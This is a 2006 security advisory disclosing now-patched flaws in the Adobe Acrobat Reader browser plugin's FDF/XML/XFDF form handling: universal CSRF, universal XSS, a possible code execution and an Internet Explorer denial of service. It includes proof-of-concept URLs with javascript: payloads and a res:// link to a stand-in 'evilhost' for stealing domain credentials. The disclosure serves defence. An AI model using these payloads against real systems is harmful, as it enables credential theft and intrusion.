Adobe Acrobat Reader Plugin - Multiple Vulnerabilities Original Advisory: http://www.wisec.it/vulns.php?page=9 Original Discovery and Research: Stefano Di Paola Contribution: Giorgio Fedon (IE Dos, UXSS Analysis) Elia Florio (Poc and Code Execution analysis) Status: Vendor Informed on 15 October 2006 Patched: Yes Please upgrade your current version of adobe acrobat _______________________________________________________ Brief Intro: During our lecture at 23C3 (Subverting Ajax), we presented some interesting attack vectors to take advantage of the dangerous vulnerability called "Prototype Hijacking" in browser frameworks. Any XSS represents a good entry point, and single Universal XSS is de facto the best entry point. Since Adobe did a great job and patched in less than 1 month the issues herein reported, we decided to undisclose our findings during 23C3 to make the audience better understand risks and impacts of high-level plugins vulnerabilities (e.g. Func. Integration and not memory corruption). There is also a possible remote code execution (RCE), but was not the focus of our talk. Affected Versions: Adobe Acrobat Reader plugin 7 (fully patched) and Below Tested On: Firefox 1.5.0.7 and Below, 2.0RC2 under Windows XP SP2 Firefox 1.5.0.7 and Below, 2.0RC2 under Ubuntu 6.06 Internet Explorer SP2 under Windows XP SP2 Summary: Adobe Acrobat plugin for Mozilla Firefox (acroreader) is able to populate Portable Documents (PDF files) forms by supplying an external set of datas through the FDF, XML, or XFDF fields. Implementation of FDF, XML, XFDF (http://partners.adobe.com/public/developer/en/acrobat/PDFOpenParameters.pdf) functionalities in Acrobat Reader Plugin is vulnerable to different kind of attacks. Vulnerability extent changes from browser to browser: 1. Universal CSRF / session riding; (Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin) 2. UXSS in #FDF, #XML e #XFDF; (Mozilla Firefox + Acrobat Reader plugin) 3. Possible Remote Code Execution; (Mozilla Firefox + Acrobat Reader plugin) 4. Denial of Service; (Internet Explorer + Acrobat Reader plugin) ______________________________________ 1. Universal CSRF and session riding This is probably Adobe related as all tested browsers (IE,Firefox,Opera) where affected. The issue is that by creating a special link like this: http://site.com/file.pdf#FDF=http://victim.com/index.html?param=... automatically Adobe plugin sends a request to 'victim.com' without user interaction asking for defined page in 'fdf' parameter. This could be used as a Universal Session Riding (aka UCSRF) attack which is a well known vulnerability. Note that the same effect is accomplished by using 'xml' and 'xfdf' parameters. ===== 2. UXSS in #FDF, #XML e #XFDF In addition by using the following request, is possible to execute javascript code inside Firefox browser: http://site.com/file.pdf#FDF=javascript:alert('Test Alert') The previous could be triggered against a site and because of this is a Universal Cross Site Scripting. UXSS is a particular type of Cross Site Scripting and has the ability to be triggered by exploiting flaws inside browsers, instead of leveraging the vulnerabilities against insecure web sites. It's also possible to force clients to download files by supplying: http://site.com/file.pdf#FDF=javascript:document.location= 'file://C:/winnt/notepad.exe' Alternative Attack using NamedPipes - http://www.514.es/2006/10/exploiting_win32_design_flaws.html In order to steal Domain credentials with explorer : http://anyhost/file.pdf#fdf=res://\\evilhost\pipe\apipe and then by applying techniques found in 514.es paper we found this kind of url and protocol (res://) could be used too. This means that also Internet Explorer could be abused in conjunction of Adobe plugin to make attacks on internal LANs and get victims credentials. 3. Possible Remote Code Execution There is also a possible Remote code Execution by leveraging a memory corruption inside Firefox by supplying the following request: http://site.com/file.pdf#FDF=javascript:document.write('jjjjj...'); It's possible to cause a DoubleFree() error and to overwrite part of the Structural Exception Handler. Runtime vulnerability analisys The problem seems to be caused by a "Double MSVCRT.free()" executed by Acrobat plugin. The routine which cause Firefox to crash is located in the following call to NP_Shutdown(). Elia Florio is credited for Runtime analysis and exploitation. NB. The POC of this vulnerability won't be released. ===== 4. Denial of Service (Internet Explorer only); By supplying the following request via the web browser, it's possible to cause a denial of service in Internet Explorer: http://site.com/file.pdf#####...(More '#') The application is waiting for more inputs and allocates more memory. -- ...oOOo...oOOo.... Stefano Di Paola Software & Security Engineer Web: www.wisec.it ..................